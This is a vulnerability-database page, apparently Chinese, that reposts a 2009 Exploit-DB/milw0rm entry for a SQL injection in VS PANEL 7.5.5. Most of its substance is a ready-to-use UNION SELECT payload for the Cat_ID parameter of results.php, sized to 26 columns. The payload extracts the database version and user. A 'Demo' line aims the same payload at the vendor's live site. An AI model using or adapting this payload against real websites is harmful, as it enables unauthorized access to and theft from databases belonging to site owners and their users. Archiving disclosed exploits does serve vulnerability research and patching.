VS PANEL 7.5.5 - 'Cat_ID' SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1058060 漏洞类型
发布时间 2009-07-27 更新时间 2009-07-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/9267
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################### Infos ########################################
# [Re]Found : Otavio Augusto a.k.a octopos ( octopos8?gmail.com ) #
# Product: VS PANEL v.7.5.5   (Patched?)                          #
# Homepage: http://www.vspanel.gr/                                #
###################################################################

############################################################
# Bug Original posted in http://milw0rm.com/exploits/9171  #
# Appears that VS PANELS V7.5.5 was "corrected" the bug    #
# changing the number of columns to 26... Oo               #                                                                                              
############################################################

############################################## SQL Injection #################################################################################
#  site/path/results.php?Cat_ID=null+union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--    #
##############################################################################################################################################


############################################### Demo ###################################################################################################
# http://www.vspanel.gr/results.php?Cat_ID=null++union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--  #
########################################################################################################################################################

# milw0rm.com [2009-07-27]